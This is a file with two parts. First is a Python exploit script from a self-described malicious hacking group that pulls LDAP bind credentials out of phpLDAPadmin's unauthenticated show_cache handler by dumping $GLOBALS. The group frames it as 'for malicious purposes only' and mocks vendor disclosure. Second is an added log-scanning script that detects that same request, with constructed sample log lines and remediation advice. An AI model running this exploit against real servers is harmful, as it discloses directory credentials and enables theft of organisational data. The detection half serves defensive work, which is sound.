kek-exploit.py · executable file · 59 lines (51 loc) · 3.68 KB
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
KEK KOMMUNIKATIONS BRINGS YOU...
█████ ████ █████
░░███ ███░ ░░███
░███ ███ ██████ ░███ █████ █████ ██████ ██████
░███████ ███░░███ ░███░░███ ███░░ ███░░███ ███░░███
░███░░███ ░███████ ░██████░ ░░█████ ░███████ ░███ ░░░
░███ ░░███ ░███░░░ ░███░░███ ░░░░███░███░░░ ░███ ███
█████ ░░████░░██████ ████ █████ ██████ ░░██████ ░░██████
░░░░░ ░░░░ ░░░░░░ ░░░░ ░░░░░ ░░░░░░ ░░░░░░ ░░░░░░
INNOVATORS IN KEK─BASED TEKNOLOGY
EXPERTS IN RESPONSIBLE DISCLOSURE
GENERAL ALL-AROUND COOL D00DZ
╔═══════════════╗
║phpldapadmin.py║
╒═─═─═─═─═─═─═─═─═╩─═─═─═─═─═─═─═─╩═─═─═─═─═─═─═─═─═╕
┃ This file is presented for malicious purposes ┃
┃ only. Keksec takes no responsibility for ┃
┃ the use of the information in this file by ┃
┃ shit-eating whitehats, or for the patching of ┃
┃ any vulnerabilities disclosed in this file by ┃
┃ butthurt SWEs. ┃
╘═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═╛
phpLDAPadmin is a web interface for interacting with LDAP servers. LDAP
is "an open, vendor-neutral, industry standard application protocol for
accessing and maintaining distributed directory information services
over an Internet Protocol (IP) network." Basically it is a protocol for
accessing directory services, which can contain very, very juicy stuff.
phpLDAPadmin had its last stable release in 2013, but many big companies
still use it (see SCLGroup, affiliated with Cambridge Analytica).
This script exploits overlooked access control in show_cache.php, which
should not be accessible to unauthenticated users. We use it to do a
var_dump of $GLOBALS which can result in disclosure of bind_id and
bind_pass, which can then be used to either dump the directory over LDAP
with something like ldapsearch, or just log in to the web interface and
export the data.
Public Disclosure Timeline:
Found: a while ago
Contacted vendor: lol no
Disclosed publicly: today
"""
import requests, sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Silence the unverified-HTTPS warning, since verify=False is used below.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 2:
    sys.stderr.write("\x1B[31mSyntax: " + sys.argv[0] + " <url>\x1B[0m\n")
    exit(0)

# show_cache handler reached via cmd.php, as described in the docstring above;
# key=GLOBALS selects the $GLOBALS array for the var_dump.
PATH = "cmd.php?cmd=show_cache&global=HACKTHEPLANET&key=GLOBALS"

# Python 2 print statement: write the raw response body to stdout.
print requests.get(sys.argv[1] + PATH, verify=False).content
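The description above identifies the request shape that discloses `bind_id` / `bind_pass`: an unauthenticated hit on `cmd.php` with `cmd=show_cache` and `key=GLOBALS`. The following detection script is an added example and is not part of kek-exploit.py or of phpLDAPadmin. It assumes the web server writes the Apache/Nginx "combined" access-log format and that phpLDAPadmin is served under a path ending in `cmd.php`; the log lines embedded in `SAMPLE_LOG` are constructed for the demonstration. It decodes the query string (twice, to catch percent-encoded evasion such as `show%5Fcache`), flags any `show_cache` request, and ranks a `200` with `key=GLOBALS` highest because that combination is what the script above relies on.

```python
#!/usr/bin/env python3
"""Added detection example: flag access-log entries that reach phpLDAPadmin's
show_cache handler through cmd.php (the request kek-exploit.py issues).
Assumes combined log format; SAMPLE_LOG lines are constructed, not real."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/Nginx "combined" format (assumed; adapt the regex for other formats).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample log: one benign page load, two cache-dump hits (one
# percent-encoded), one unrelated cmd.php command, and one blocked attempt.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2018:10:01:02 +0000] "GET /phpldapadmin/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2018:10:01:07 +0000] "GET /phpldapadmin/cmd.php?cmd=show_cache&global=HACKTHEPLANET&key=GLOBALS HTTP/1.1" 200 388211 "-" "python-requests/2.18.4"
203.0.113.9 - - [12/Mar/2018:10:01:09 +0000] "GET /phpldapadmin/cmd.php?cmd=show%5Fcache&key=GLOBALS HTTP/1.1" 200 388211 "-" "curl/7.58.0"
10.0.0.7 - - [12/Mar/2018:10:02:00 +0000] "GET /phpldapadmin/cmd.php?cmd=template_engine&server_id=0 HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
198.51.100.2 - - [12/Mar/2018:10:03:30 +0000] "GET /phpldapadmin/cmd.php?cmd=show_cache HTTP/1.1" 403 199 "-" "curl/7.58.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    url = urlsplit(rec["path"])
    # unquote() once, then parse_qs() decodes again: this deliberately
    # over-decodes so that double-encoded parameter names still match.
    q = parse_qs(unquote(url.query), keep_blank_values=True)
    rec["script"] = url.path.rsplit("/", 1)[-1].lower()
    rec["query"] = {k.lower(): [v.lower() for v in vs] for k, vs in q.items()}
    return rec


def classify(rec):
    """Return (severity, reason) for a show_cache request, or None if benign."""
    if rec["script"] != "cmd.php":
        return None
    if "show_cache" not in rec["query"].get("cmd", []):
        return None
    keys = rec["query"].get("key", [])
    if rec["status"] == 200 and "globals" in keys:
        return ("high", "show_cache with key=GLOBALS returned 200: bind credentials likely disclosed")
    if rec["status"] == 200:
        return ("medium", "show_cache returned 200")
    return ("low", "show_cache attempted but blocked (status %d)" % rec["status"])


def scan_log(text):
    """Scan log text and return a list of findings, one per flagged request."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hit = classify(rec)
        if hit:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "ua": rec["ua"],
                             "severity": hit[0], "reason": hit[1]})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("[%s] %s %s %s (%s)" % (f["severity"].upper(), f["ts"], f["ip"], f["reason"], f["ua"]))
```

Any `high` finding should be treated as a credential exposure: rotate the bind account's password and audit LDAP access from the flagged source. The durable fix is to deny `cmd=show_cache` at the web server or require an authenticated session for it, after which the same scan should only ever produce `low` findings.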